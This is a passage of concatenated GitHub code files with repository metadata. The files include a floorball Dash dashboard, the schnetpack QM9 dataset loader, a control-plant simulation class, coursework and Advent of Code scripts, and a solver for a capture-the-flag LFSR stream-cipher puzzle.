barmode=\"group\",\n labels={'powerplay': 'Powerplay', 'boxplay': 'Boxplay'})\nfig_efficeny = px.scatter(df, x=\"boxplay_efficiency\", y='powerplay_efficiency', text='team_name',\n hover_name='team_name', hover_data=['rank', 'points', 'points_per_game'],\n labels={'powerplay_efficiency': 'Powerplay Effizienz',\n 'boxplay_efficiency': 'Boxplay Effizienz'})\nfig_efficeny.update_traces(textposition='top center')\n\nteams = df['team_name'].to_list()\npoints_against = df['points_against'].to_list()\n\nheatmap = pd.DataFrame(columns=['team_name'] + teams)\n\nheatmap_data = []\nfor points, team in zip(points_against, teams):\n points = json.loads(points.replace(\"'\", '\"'))\n d = {'team_name': team}\n d.update(points)\n heatmap_data.append(d)\nheatmap = pd.DataFrame(heatmap_data, columns=['team_name'] + teams, index=teams)\n\nfig_points_against = px.imshow(heatmap[teams], y=teams, text_auto=True)\nfig_points_against = fig_points_against.update_layout(showlegend=False)\n\nfig_goals_per_game = px.scatter(df, x=\"goals_per_game\", text='team_name', hover_name='team_name',\n hover_data=['points', 'points_per_game', 'scoring_ratio'], y='goals_against_per_game',\n labels={'goals_per_game': 'Goals per Game',\n 'goals_against_per_game': 'Goals Against per Game'})\nfig_goals_per_game.update_traces(textposition='top center')\n\nspecial_goals_fig = px.bar(df, x=\"team_name\",\n y=['leading_goals', 'equalizer_goals', 'first_goal_of_match', 'penalty_shot_goals'],\n labels={'leading_goals': 'Leading Goals', 'equalizer_goals': 'Equalizer Goals',\n 'first_goal_of_match': 'First Goal of Match',\n 'penalty_shot_goals': 'Penalty Shot Goals',\n })\n\nspecial_goals_against_fig = px.bar(df, x=\"team_name\",\n y=['leading_goals_against', 'equalizer_goals_against', 'first_goal_of_match_against', 'penalty_shot_goals_against'],\n labels={'leading_goals_against': 'Leading Goals', 'equalizer_goals_against': 'Equalizer Goals',\n 'first_goal_of_match_against': 'First Goal of Match',\n 'penalty_shot_goals_against': 'Penalty Shot Goals',\n })\nspecial_goals_fig.update_xaxes(tickangle=25)\nspecial_goals_fig.update_yaxes(range=[0,60])\nspecial_goals_against_fig.update_xaxes(tickangle=25)\n# set the same max values\nspecial_goals_against_fig.update_yaxes(range=[0, 60])\n\ncolumns = [c for c, t in zip(df.columns, df.iloc[0]) if type(t) not in [dict, list]]\n\napp.layout = dbc.Container(html.Div(children=[\n html.H1(children='Floorball Bundesliga Dashboard'),\n\n dbc.Row(children=[dcc.Dropdown(\n id='period-filter',\n options=[\n {'label': period, 'value': period} for period in\n ['full_game', 'first_period', 'second_period', 'third_period', 'overtime']\n ],\n value='full_game' # Default selection\n )]),\n dbc.Row(children=[\n dbc.Col(dcc.Graph(id='goals-graph', figure=fig_goals, )), # config={'edits': {'legendPosition': False, }})),\n dbc.Col(dcc.Graph(id='penalty-graph', figure=fig_penalties, )),#config={'edits': {'legendPosition': False, }}))\n ]),\n dbc.Row(children=[\n dbc.Col(\n dcc.Graph(id='efficiency-graph', figure=fig_efficeny),\n ),\n dbc.Col(dcc.Graph(id='fig_goals_per_game', figure=fig_goals_per_game)),\n\n ]),\n dbc.Row(\n children=[\n dbc.Col(children=[dcc.Graph(id='fig_points_against', figure=fig_points_against)])\n ]\n ),\n dbc.Row(\n children=[\n dbc.Col(children=[dcc.Graph(id='special_goals_fig', figure=special_goals_fig),]),\n dbc.Col(children=[dcc.Graph(id='special_goals_against_fig', figure=special_goals_against_fig),])\n ]\n ),\n dcc.Checklist(id='table-columns',\n options=[{'label': col, 'value': col} for col in [\n 'points_per_game',\n 'home_points',\n 'away_points',\n ]],\n inline=True\n ),\n dash_table.DataTable(\n id='table',\n columns=[{\"name\": i, \"id\": i} for i in columns],\n data=df[columns].to_dict('records'),\n sort_action='native',\n style_cell={'text-align': 'left'}\n )\n]), fluid=False)\n\n\n@app.callback(\n Output('goals-graph', 'figure'),\n [Input('period-filter', 'value')]\n)\ndef update_goals_graph(selected_period):\n goals, goals_against = 'goals', 'goals_against'\n if selected_period == 'first_period':\n goals += '_in_first_period'\n goals_against = 'goals_in_first_period_against'\n elif selected_period == 'second_period':\n goals += '_in_second_period'\n goals_against = 'goals_in_second_period_against'\n elif selected_period == 'third_period':\n goals += '_in_third_period'\n goals_against = 'goals_in_third_period_against'\n elif selected_period == 'overtime':\n goals += '_in_overtime'\n goals_against = 'goals_in_overtime_against'\n\n fig = px.bar(df, x=\"team_name\", y=[goals, goals_against], barmode=\"group\", labels={'goals': 'Goals', 'goals_against': 'Goals Against'})\n fig.update_xaxes(title_text='Teams')\n fig.update_yaxes(title_text='Goals')\n #fig.update_layout(showlegend=False)\n return fig\n\n\n@app.callback(\n Output('table', 'columns'),\n [Input('table-columns', 'value')])\ndef update_table(selected_columns):\n default_columns = ['rank', 'team_name', 'points', 'goals', 'goals_against']\n if selected_columns is not None:\n columns = default_columns + selected_columns\n else:\n columns = default_columns\n return [{\"name\": col, \"id\": col} for col in columns]\n\n\n@app.callback(\n Output('penalty-graph', 'figure'),\n [Input('period-filter', 'value')]\n)\ndef update_penalties_graph(selected_period):\n powerplay, boxplay = 'powerplay', 'boxplay'\n if selected_period == 'first_period':\n powerplay += '_first_period'\n boxplay += '_first_period'\n elif selected_period == 'second_period':\n powerplay += '_second_period'\n boxplay += '_second_period'\n elif selected_period == 'third_period':\n powerplay += '_third_period'\n boxplay += '_third_period'\n elif selected_period == 'overtime':\n powerplay += '_overtime'\n boxplay += '_overtime'\n fig = px.bar(df, x=\"team_name\", y=[powerplay, boxplay], barmode=\"group\")\n return fig\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n","repo_name":"chefkoch24/floorball-stats","sub_path":"dashboard/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":7958,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"39833620318","text":"#!/usr/bin/env python\n\nimport re\n\nf = open(\"uk.txt\")\nfor line in f:\n line = line.rstrip()\n pattern = re.compile('(==*)\\s*(.*?)\\s*\\\\1')\n match = pattern.match(line)\n if match:\n print( [ len(match.group(1))-1, \n match.group(2) ] )","repo_name":"masao/nlp100","sub_path":"23.py","file_name":"23.py","file_ext":"py","file_size_in_byte":263,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"34"} +{"seq_id":"5147842902","text":"import logging\nimport os\nimport re\nimport shutil\nimport tarfile\nimport tempfile\nfrom urllib import request as request\nfrom urllib.error import HTTPError, URLError\n\nimport numpy as np\nfrom ase.db import connect\nfrom ase.io.extxyz import read_xyz\nfrom ase.units import Debye, Bohr, Hartree, eV\n\nfrom schnetpack.data import AtomsData\nfrom schnetpack.environment import SimpleEnvironmentProvider\n\n\nclass QM9(AtomsData):\n \"\"\" QM9 benchmark dataset for organic molecules with up to nine heavy atoms from {C, O, N, F}.\n\n This class adds convenience functions to download QM9 from figshare and load the data into pytorch.\n\n Args:\n path (str): path to directory containing qm9 database.\n download (bool): enable downloading if database does not exists (default: True)\n subset (list): indices of subset. Set to None for entire dataset (default: None)\n properties (list): properties in qm9, e.g. U0\n pair_provider (BaseEnvironmentProvider):\n remove_uncharacterized (bool): remove uncharacterized molecules from dataset (according to [#qm9_1]_)\n\n References:\n .. [#qm9_1] https://ndownloader.figshare.com/files/3195404\n\n \"\"\"\n\n # properties\n A = 'rotational_constant_A'\n B = 'rotational_constant_B'\n C = 'rotational_constant_C'\n mu = 'dipole_moment'\n alpha = 'isotropic_polarizability'\n homo = 'homo'\n lumo = 'lumo'\n gap = 'gap'\n r2 = 'electronic_spatial_extent'\n zpve = 'zpve'\n U0 = 'energy_U0'\n U = 'energy_U'\n H = 'enthalpy_H'\n G = 'free_energy'\n Cv = 'heat_capacity'\n\n properties = [\n A, B, C, mu, alpha,\n homo, lumo, gap, r2, zpve,\n U0, U, H, G, Cv\n ]\n\n reference = {\n zpve: 0, U0: 1, U: 2, H: 3, G: 4, Cv: 5\n }\n\n units = dict(\n zip(properties,\n [\n 1., 1., 1., Debye, Bohr ** 3,\n Hartree, Hartree, Hartree,\n Bohr ** 2, Hartree,\n Hartree, Hartree, Hartree,\n Hartree, 1.\n ]\n )\n )\n\n def __init__(self, path, download=True, subset=None, properties=[], collect_triples=False,\n remove_uncharacterized=False):\n self.path = path\n self.dbpath = os.path.join(self.path, 'qm9.db')\n self.atomref_path = os.path.join(self.path, 'atomref.npz')\n self.evilmols_path = os.path.join(self.path, 'evilmols.npy')\n\n environment_provider = SimpleEnvironmentProvider()\n\n if download:\n self._download()\n\n if remove_uncharacterized:\n if subset is None:\n with connect(self.dbpath) as con:\n subset = np.arange(con.count())\n else:\n subset = np.array(subset)\n evilmols = np.load(self.evilmols_path)\n\n # attention: 1-indexing vs 0-indexing\n subset = np.setdiff1d(subset, evilmols - 1)\n\n super().__init__(self.dbpath, subset, properties, environment_provider, collect_triples)\n\n def create_subset(self, idx):\n idx = np.array(idx)\n subidx = idx if self.subset is None else np.array(self.subset)[idx]\n\n return QM9(self.path, False, subidx, self.properties, self.collect_triples, False)\n\n def _download(self):\n works = True\n if not os.path.exists(self.path):\n os.makedirs(self.path)\n\n if not os.path.exists(self.atomref_path):\n works = works and self._load_atomrefs()\n if not os.path.exists(self.dbpath):\n works = works and self._load_data()\n if not os.path.exists(self.evilmols_path):\n works = works and self._load_evilmols()\n return works\n\n def get_reference(self, property):\n \"\"\"\n Returns atomref for property.\n\n Args:\n property: property in the qm9 dataset\n\n Returns:\n list: list with atomrefs\n \"\"\"\n if property not in QM9.reference:\n atomref = None\n else:\n col = QM9.reference[property]\n atomref = np.load(self.atomref_path)['atom_ref'][:, col:col + 1]\n return atomref\n\n def _load_atomrefs(self):\n logging.info('Downloading GDB-9 atom references...')\n at_url = 'https://ndownloader.figshare.com/files/3195395'\n tmpdir = tempfile.mkdtemp('gdb9')\n tmp_path = os.path.join(tmpdir, 'atomrefs.txt')\n\n try:\n request.urlretrieve(at_url, tmp_path)\n logging.info(\"Done.\")\n except HTTPError as e:\n logging.error(\"HTTP Error:\", e.code, at_url)\n return False\n except URLError as e:\n logging.error(\"URL Error:\", e.reason, at_url)\n return False\n\n atref = np.zeros((100, 6))\n labels = ['zpve', 'U0', 'U', 'H', 'G', 'Cv']\n with open(tmp_path) as f:\n lines = f.readlines()\n for z, l in zip([1, 6, 7, 8, 9], lines[5:10]):\n atref[z, 0] = float(l.split()[1])\n atref[z, 1] = float(l.split()[2]) * Hartree / eV\n atref[z, 2] = float(l.split()[3]) * Hartree / eV\n atref[z, 3] = float(l.split()[4]) * Hartree / eV\n atref[z, 4] = float(l.split()[5]) * Hartree / eV\n atref[z, 5] = float(l.split()[6])\n np.savez(self.atomref_path, atom_ref=atref, labels=labels)\n return True\n\n def _load_evilmols(self):\n logging.info('Downloading list of evil molecules...')\n at_url = 'https://ndownloader.figshare.com/files/3195404'\n tmpdir = tempfile.mkdtemp('gdb9')\n tmp_path = os.path.join(tmpdir, 'uncharacterized.txt')\n\n try:\n request.urlretrieve(at_url, tmp_path)\n logging.info(\"Done.\")\n except HTTPError as e:\n logging.error(\"HTTP Error:\", e.code, at_url)\n return False\n except URLError as e:\n logging.error(\"URL Error:\", e.reason, at_url)\n return False\n\n evilmols = []\n with open(tmp_path) as f:\n lines = f.readlines()\n for line in lines[9:-1]:\n evilmols.append(int(line.split()[0]))\n np.save(self.evilmols_path, np.array(evilmols))\n\n def _load_data(self):\n logging.info('Downloading GDB-9 data...')\n tmpdir = tempfile.mkdtemp('gdb9')\n tar_path = os.path.join(tmpdir, 'gdb9.tar.gz')\n raw_path = os.path.join(tmpdir, 'gdb9_xyz')\n url = 'https://ndownloader.figshare.com/files/3195389'\n\n try:\n request.urlretrieve(url, tar_path)\n logging.info(\"Done.\")\n except HTTPError as e:\n logging.error(\"HTTP Error:\", e.code, url)\n return False\n except URLError as e:\n logging.error(\"URL Error:\", e.reason, url)\n return False\n\n tar = tarfile.open(tar_path)\n tar.extractall(raw_path)\n tar.close()\n\n logging.info('Parse xyz files...')\n with connect(self.dbpath) as con:\n ordered_files = sorted(os.listdir(raw_path), key=lambda x: (int(re.sub('\\D', '', x)), x))\n for i, xyzfile in enumerate(ordered_files):\n xyzfile = os.path.join(raw_path, xyzfile)\n\n if (i + 1) % 10000 == 0:\n logging.info('Parsed: {:6d} / 133885'.format(i + 1))\n properties = {}\n tmp = os.path.join(tmpdir, 'tmp.xyz')\n\n with open(xyzfile, 'r') as f:\n lines = f.readlines()\n l = lines[1].split()[2:]\n for pn, p in zip(self.properties, l):\n properties[pn] = float(p) * self.units[pn]\n with open(tmp, \"wt\") as fout:\n for line in lines:\n fout.write(line.replace('*^', 'e'))\n\n with open(tmp, 'r') as f:\n ats = list(read_xyz(f, 0))[0]\n\n con.write(ats, data=properties)\n logging.info('Done.')\n\n shutil.rmtree(tmpdir)\n\n return True\n","repo_name":"lauri-codes/schnetpack","sub_path":"src/schnetpack/datasets/qm9.py","file_name":"qm9.py","file_ext":"py","file_size_in_byte":8088,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"34"} +{"seq_id":"72730465377","text":"#!/usr/bin/env python3\n\n##\n## EPITECH PROJECT, 2023\n## 107transfer\n## File description:\n## python file\n##\n\nfrom argparse import ArgumentParser, Namespace\nfrom sys import argv, exit\nfrom typing import List\n\n\ndef man_help() -> int:\n print(\n \"\"\"USAGE\n ./107transfer [num dem]*\nDESCRIPTION\n num polynomial numerator defined by its coefficients\n dem polynomial denominator defined by its coefficients\n\n 2x -h for more infos. \"\"\"\n )\n return 0\n\n\ndef man_help2() -> int:\n print(\n \"\"\"USAGE\n ./107transfer [num dem]*\nDESCRIPTION\n num polynomial numerator defined by its coefficients, separated by '*'\n Example: \"1*2*3\" for \"3x^2 + 2x + 1\"\n dem polynomial denominator defined by its coefficients, separated by '*'\n Example: \"1*2*3\" for \"3x^2 + 2x + 1\"\n Coefficients should not be zero.\n Coefficients must be integers between -100 and 100 inclusive.\"\"\"\n )\n return 0\n\n\ndef get_polynom(formule: str) -> List[int]:\n try:\n return [int(coeff) for coeff in formule.split('*')]\n except ValueError:\n print(\"Invalid Number\")\n exit(84)\n\n\ndef evaluate_polynomial(coefficients: List[int], x: float) -> float:\n result = 0.0\n for coeff in reversed(coefficients):\n result = result * x + coeff\n return result\n\n\ndef trans_print(args: List[List[int]]) -> None:\n x: float = 0\n while x <= 1.001:\n result: float = 1\n for num, dem in zip(args[::2], args[1::2]):\n numerator = evaluate_polynomial(num, x)\n denominator = evaluate_polynomial(dem, x)\n if denominator == 0:\n exit(84)\n result *= numerator / denominator\n print(f\"{x:.3f} -> {result:.5f}\")\n x += 0.001\n\n\ndef get_args() -> List[List[int]]:\n parser: ArgumentParser = ArgumentParser()\n parse_list: List[List[int]] = []\n\n parser.add_argument(\"formules\", type=str, nargs=\"+\")\n\n try:\n args: Namespace = parser.parse_args()\n parse_list = [get_polynom(formule) for formule in args.formules]\n except SystemExit:\n exit(84)\n\n return parse_list\n\n\ndef main() -> int:\n if \"-h\" in argv:\n if argv.count(\"-h\") == 2:\n return man_help2()\n return man_help()\n if (len(argv) - 1) % 2 != 0:\n print(\"Invalid Numbers\")\n return 84\n args: List[List[int]] = get_args()\n trans_print(args)\n return 0\n\n\nif __name__ == \"__main__\":\n exit(main())\n","repo_name":"Garoverr/107transfer","sub_path":"107transfer.py","file_name":"107transfer.py","file_ext":"py","file_size_in_byte":2485,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"34"} +{"seq_id":"1307773752","text":"from typing import List, Optional, Protocol, Tuple, Union\n\nimport numpy\nfrom casadi import DM, Function, mtimes, vertcat\n\nfrom yaocptool.modelling import DataSet, SystemModel\n\n\nclass PlantInterface(Protocol):\n name: str\n t_0: float\n t_s: float\n\n def get_measurement(self) -> Tuple[float, DM, DM]:\n \"\"\"\n :returns: (timestamp, measuremnt, control)\n \"\"\"\n ...\n\n def set_control(self, u):\n pass\n\n\nclass PlantSimulation(PlantInterface):\n \"\"\"\n Simulates a plant using a model.\n\n \"\"\"\n\n def __init__(\n self,\n model: SystemModel,\n x_0: DM,\n u_0: DM,\n y_guess: float,\n t_0: float = 0.0,\n t_s: float = 0.0,\n c_matrix: Optional[DM] = None,\n d_matrix: Optional[DM] = None,\n verbosity: int = 1,\n super_samling: Union[int, List[float]] = 1,\n u_function: Optional[Function] = None,\n ):\n \"\"\"\n Plant which uses a SystemModel.simulate to obtain the measurements.\n\n :param SystemModel model: simulation model\n :param DM x_0: initial condition\n :param DM t_s: (default: 1) sampling time\n :param DM u: (default: 0) initial control\n :param DM y_guess: initial guess for algebraic variables for simulation\n :param DM t_0: (default: 0) initial time\n :param dict integrator_options: integrator options\n :param bool has_noise: Turn on/off the process/measurement noise\n :param DM r_n: Measurement noise covariance matrix\n :param DM r_v: Process noise covariance matrix\n :param noise_seed: Seed for the random number generator used to create noise. Use the same seed for the\n repeatability in the experiments.\n \"\"\"\n self.model = model\n self.name = self.model.name\n self.t_s = float(t_s)\n\n self.x = x_0\n self.measurement = x_0\n self.u = u_0 if u_0 is not None else DM.zeros(self.model.n_u)\n self.t = self.t_0 = float(t_0)\n\n self.y_guess = y_guess\n self.u_function = u_function\n\n self.c_matrix = (\n c_matrix\n if c_matrix is not None\n else DM.eye(self.model.n_x + self.model.n_y)\n )\n self.d_matrix = d_matrix if d_matrix is not None else DM(0.0)\n self.d_matrix = None\n\n self.p = None\n self.theta = None\n\n # Noise\n self.has_noise = False\n self.r_n = DM(0.0)\n self.r_v = DM(0.0)\n self.noise_seed = None\n\n # Options\n self.verbosity = verbosity\n self.sampling_points = (\n [1.0 / super_samling * (point + 1) for point in range(super_samling)]\n if isinstance(super_samling, int)\n else super_samling\n )\n self.integrator_options = None\n self.dataset = DataSet(name=\"Plant\")\n\n self._iterations = 0\n\n self._initialize_dataset()\n\n meas_data = self._measure(self.x, self.y_guess)\n\n self._save_data(self.x, self.y_guess, self.u, **meas_data)\n if self.has_noise and self.noise_seed is not None:\n numpy.random.seed(self.noise_seed)\n\n def get_measurement(self) -> Tuple[float, DM, DM]:\n \"\"\"Return the plant measurement of a simulated model and advance time by 't_s'.\n Return the measurement time, the measurement [x; y], and the controls.\n\n :rtype: tuple\n :return: (timestamp, measuremnt, control)\n \"\"\"\n return self.t, self.measurement, self.u\n\n def set_control_function(self, u_func):\n \"\"\"\n Set a new control for the plant and simulate\n\n :param DM u: new control vector\n \"\"\"\n self.u_function = u_func\n\n # go to next time\n self._advance()\n\n def set_control(self, u: Union[DM, float, List[float]]):\n \"\"\"\n Set a new control for the plant and simulate\n\n :param DM u: new control vector\n \"\"\"\n if isinstance(u, (list, int, float)):\n u = vertcat(u)\n\n if self.verbosity >= 1:\n print(\"Set control: {}\".format(u))\n\n if u.shape[0] != self.model.n_u_par:\n raise ValueError(\n \"Given control does not have the same size of the plant.\"\n \"Plant control size: {}, given control size: {}\".format(\n self.model.n_u_par, u.shape[0]\n )\n )\n self.u = u\n\n # go to next time\n self._advance()\n\n def _advance(self):\n t_start = self.t\n for delta_t in self.sampling_points:\n t_f = t_start + delta_t * self.t_s\n\n if self.u_function is not None:\n self.u = self.u_function(self.t) # type: ignore\n\n sim_result = self.model.simulate(\n x_0=self.x,\n t_0=self.t,\n t_f=t_f,\n y_0=self.y_guess,\n u=self.u,\n p=self.p,\n theta=self.theta,\n integrator_options=self.integrator_options,\n )\n\n x_sim, y, u = sim_result.final_condition().values()\n\n # Process noise\n x = x_sim + self._process_noise() if self.has_noise else x_sim\n\n self.t = t_f\n self.x = x\n self._save_data(x, y, u)\n\n # Measure\n meas_data = self._measure(x, y)\n self.dataset.insert_data(\"meas\", self.t, meas_data[\"measurement\"])\n self.dataset.insert_data(\n \"meas_wo_noise\", self.t, meas_data[\"measurement_wo_noise\"]\n )\n self.measurement = meas_data[\"measurement\"]\n\n def _process_noise(self):\n return DM(numpy.random.multivariate_normal([0] * self.r_v.shape[0], self.r_v))\n\n def _measure(self, x, y):\n measurement_wo_noise = mtimes(self.c_matrix, vertcat(x, y))\n if self.has_noise:\n n_rand = DM(\n numpy.random.multivariate_normal([0] * self.r_n.shape[0], self.r_n)\n )\n measurement = measurement_wo_noise + n_rand\n else:\n measurement = measurement_wo_noise\n\n return {\n \"measurement\": measurement,\n \"measurement_wo_noise\": measurement_wo_noise,\n }\n\n def _save_data(self, x, y, u, measurement=None, measurement_wo_noise=None):\n self.dataset.insert_data(\"x\", self.t, x)\n self.dataset.insert_data(\"y\", self.t, y)\n self.dataset.insert_data(\"u\", self.t, u)\n\n if measurement is not None:\n self.dataset.insert_data(\"meas\", self.t, measurement)\n\n if measurement is not None:\n self.dataset.insert_data(\"meas_wo_noise\", self.t, measurement_wo_noise)\n\n def _initialize_dataset(self):\n self.dataset.create_entry(\n \"x\",\n self.model.n_x,\n [self.model.x[i].name() for i in range(self.model.n_x)],\n )\n\n self.dataset.create_entry(\n \"y\",\n self.model.n_y,\n [self.model.y[i].name() for i in range(self.model.n_y)],\n )\n\n self.dataset.create_entry(\n \"u\",\n self.model.n_u,\n [self.model.u[i].name() for i in range(self.model.n_u)],\n plot_style=\"step\",\n )\n\n self.dataset.create_entry(\n \"meas_wo_noise\",\n self.model.n_x,\n [\"meas_wo_noise_\" + str(i) for i in range(self.model.n_x)],\n )\n self.dataset.create_entry(\n \"meas\",\n self.model.n_x,\n [\"meas_\" + str(i) for i in range(self.model.n_x)],\n )\n","repo_name":"marcoaaguiar/yaocptool","sub_path":"yaocptool/mpc/plant.py","file_name":"plant.py","file_ext":"py","file_size_in_byte":7522,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"34"} +{"seq_id":"43559305247","text":"from Crypto.Cipher import AES, PKCS1_OAEP, PKCS1_v1_5\r\nfrom Crypto.PublicKey import RSA\r\nfrom Crypto.Util.number import inverse, long_to_bytes, bytes_to_long, isPrime, getPrime, GCD\r\nfrom tqdm import tqdm\r\nfrom pwn import *\r\nfrom sage.all import *\r\nimport gmpy2, pickle, itertools, sys, json, hashlib, os, math, time, base64, binascii, string, re, struct, datetime, subprocess\r\nimport numpy as np\r\nimport random as rand\r\nimport multiprocessing as mp\r\nfrom base64 import b64encode, b64decode\r\nfrom sage.modules.free_module_integer import IntegerLattice\r\nfrom ecdsa import ecdsa\r\n\r\n\r\ndef bsum(state, taps, l):\r\n\tret = 0\r\n\tfor i in taps:\r\n\t\tret ^= (state >> (l - i))\r\n\treturn ret & 1\r\n\r\nclass Gen:\r\n\tdef __init__(self, key, slength):\r\n\t\tself.state = key\r\n\t\tself.slength = slength\r\n\t\tself.TAPS = [2, 4, 5, 7, 10, 12, 13, 17, 19, 24, 25, 27, 30, 32, \r\n\t\t33, 34, 35, 45, 47, 49, 50, 52, 54, 56, 57, 58, 59, 60, 61, 64]\r\n\r\n\tdef clock(self):\r\n\t\tout = bsum(self.state, self.TAPS, self.slength)\r\n\t\tself.state = (out << (self.slength - 1)) + (self.state >> 1)\r\n\t\treturn out\r\n\r\ndef gf256_multiply(a, b):\r\n\tp = 0\r\n\tfor _ in range(8):\r\n\t\tif b % 2:\r\n\t\t\tp ^= a\r\n\t\tcheck = a & 0x80\r\n\t\ta <<= 1\r\n\t\tif check == 0x80:\r\n\t\t\ta ^= 0x1b\r\n\t\tb >>= 1\r\n\treturn p % 256\r\n\r\ndef gf256_inverse(x):\r\n\tret = 1\r\n\td = 254\r\n\twhile d > 0:\r\n\t\tif d % 2 == 1:\r\n\t\t\tret = gf256_multiply(ret, x)\r\n\t\td //= 2\r\n\t\tx = gf256_multiply(x, x)\r\n\treturn ret\r\n\r\nlookup = [0] * 256\r\nfor i in range(1, 256):\r\n\tlookup[i] = gf256_inverse(i)\r\n\tassert gf256_multiply(lookup[i], i) == 1\r\n\r\nval = []\r\nfor i in range(256):\r\n\tval.append([0] * 256)\r\nfor i in range(256):\r\n\tfor j in range(256):\r\n\t\tval[i][j] = gf256_multiply(i, j)\r\n\r\ndef encrypt(fn, outf, key):\r\n\tcipher = Gen(key, 64)\r\n\tpt = b''\r\n\twith open(fn, 'rb') as f:\r\n\t\tpt = f.read()\r\n\tct = b''\r\n\tfor byte in pt:\r\n\t\tgenbyte = 0\r\n\t\tfor i in range(8):\r\n\t\t\tgenbyte = genbyte << 1\r\n\t\t\tgenbyte += cipher.clock()\r\n\t\tct += long_to_bytes(gf256_multiply(genbyte, byte))\r\n\twith open(outf, 'wb') as f:\r\n\t\tf.write(ct)\r\n\r\ndef decrypt(fn, key):\r\n\tglobal lookup, val\r\n\tcipher = Gen(key, 64)\r\n\tct = b''\r\n\twith open(fn, 'rb') as f:\r\n\t\tct = f.read()\r\n\tpt = b''\r\n\tfor byte in ct:\r\n\t\tgenbyte = 0\r\n\t\tfor i in range(8):\r\n\t\t\tgenbyte = genbyte << 1\r\n\t\t\tgenbyte += cipher.clock()\r\n\t\tpt += long_to_bytes(val[lookup[genbyte]][byte])\r\n\tl = len(pt)\r\n\tcnt = 0\r\n\tfor byte in pt:\r\n\t\tif byte < 128:\r\n\t\t\tcnt += 1\r\n\tprint(key, cnt / l)\r\n\tif cnt / l >= 0.6 or b\"ctf{\" in pt: # high ascii? ctf{ ?\r\n\t\tprint(pt)\r\n\r\nTAPS = [2, 4, 5, 7, 10, 12, 13, 17, 19, 24, 25, 27, 30, 32, \r\n\t\t33, 34, 35, 45, 47, 49, 50, 52, 54, 56, 57, 58, 59, 60, 61, 64]\r\n\r\nR = PolynomialRing(GF(2), 'x')\r\nx = R.gen()\r\n\r\nf = (x ** 64)\r\n\r\nfor t in TAPS:\r\n\tf += (x ** (64 - t))\r\n\r\npoly = f\r\n\r\n\r\nM = [poly.list()[1:]]\r\nfor i in range(63):\r\n\tM.append([1 if j == i else 0 for j in range(64)])\r\n\r\nex = 255\r\n\r\nM = Matrix(GF(2), M)\r\nA = M ** ex \r\ng = (x ** ex) - 1\r\ng = g % f \r\nprint(f.gcd(g))\r\n\r\n\r\nE, S = A.eigenspaces_right(format='galois')[0]\r\nassert E == 1\r\n\r\nbasis = S.basis()\r\n\r\nfor i in tqdm(range(1, 1 << len(basis))):\r\n\tvec = vector(GF(2), [0] * 64)\r\n\tfor j in range(len(basis)):\r\n\t\tif ((i >> j) & 1) == 1:\r\n\t\t\tvec += basis[j]\r\n\tassert A * vec == vec\r\n\ttt = list(vec)[::-1]\r\n\tfor j in range(64):\r\n\t\ttt[j] = int(tt[j])\r\n\tkey = int(''.join([str(d) for d in tt]), 2)\r\n\tdecrypt(\"ct\", key)\r\n","repo_name":"rkm0959/Cryptography_Writeups","sub_path":"2021/corCTF/stream.py","file_name":"stream.py","file_ext":"py","file_size_in_byte":3309,"program_lang":"python","lang":"en","doc_type":"code","stars":73,"dataset":"github-code","pt":"34"} +{"seq_id":"34825324395","text":"import os\nimport time\nimport re\n\ndir_path = os.path.dirname(os.path.realpath(__file__))\n\n\ndef parse_input(file: str):\n lines = open(f\"{dir_path}/{file}.txt\", \"r\").read().splitlines()\n limits, tickets, my_ticket = [], [], []\n handle_limit, i = True, 0\n field_pos = {}\n while i < len(lines):\n line = lines[i]\n if line == \"\":\n i += 2\n handle_limit = False\n continue\n if handle_limit:\n limits.append(list(map(int, re.findall(r'(\\d+)', line))))\n field_pos[line.split(\":\")[0]] = []\n elif my_ticket == []:\n my_ticket = list(map(int, line.split(\",\")))\n else:\n tickets.append(list(map(int, line.split(\",\"))))\n i += 1\n return limits, tickets, field_pos, my_ticket\n\n\nlimits, tickets, field_pos, my_ticket = parse_input(\"input\")\n\n\ndef is_valid(n: int, limit: tuple):\n return limit[0] <= n <= limit[1] or limit[2] <= n <= limit[3]\n\n\ndef part_1(limits=limits, tickets=tickets):\n valid_ticket = tickets[:]\n res = 0\n for i, ticket in enumerate(tickets):\n # check every ticket number\n for n in ticket:\n valid_n = False\n for limit in limits:\n if is_valid(n, limit):\n valid_n = True\n break # pass to next n in ticket\n else:\n continue\n if not valid_n:\n res += n\n valid_ticket.remove(ticket)\n break # skip end of ticket\n return res, valid_ticket\n\n\ndef part_2(limits=limits, tickets=tickets, field_pos=field_pos, my_ticket=my_ticket):\n for j, field in enumerate(field_pos):\n limit = limits[j]\n # test ith element\n for i in range(len(field_pos)):\n valid_for_all = True\n for ticket in tickets:\n if is_valid(ticket[i], limit):\n continue\n else:\n valid_for_all = False\n break\n if valid_for_all:\n old_pos = field_pos[field]\n old_pos.append(i)\n field_pos[field] = old_pos\n final_pos = find_final_pos(field_pos)\n res = 1\n for field, pos in final_pos.items():\n if field.startswith(\"departure\"):\n res *= my_ticket[pos[0]]\n return res\n\n\ndef find_final_pos(field_pos):\n if all([len(x) == 1 for x in field_pos.values()]):\n return field_pos\n uniques = []\n for p in field_pos.values():\n if len(p) == 1:\n uniques.append(p[0])\n # remove all unique from every list\n for k, p in field_pos.items():\n if len(p) == 1:\n continue\n new = [x for x in p if x not in uniques]\n field_pos[k] = new\n return find_final_pos(field_pos)\n\n\ndef test_demo():\n limits, tickets, field_pos, my_ticket = parse_input(\"demo\")\n assert part_1(limits, tickets)[0] == 71\n\n\nstart = time.time()\nres_1, valid_tickets = part_1()\nprint(\"Part 1:\", res_1, \"/ Part 2:\", part_2(tickets=valid_tickets))\nprint(\"--- %.4f seconds ---\" % (time.time() - start))\n","repo_name":"adrientiburce/adventofcode","sub_path":"2020/day_16/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":3110,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"34"} +{"seq_id":"70958997539","text":"from typing import Optional\nfrom pprint import pprint\n\nimport numpy as np\nimport torch\nfrom torch import nn, optim\nimport torch.nn.functional as F\nfrom pytorch_lightning import LightningModule\nfrom transformers import AdamW, AutoConfig, AutoModel, 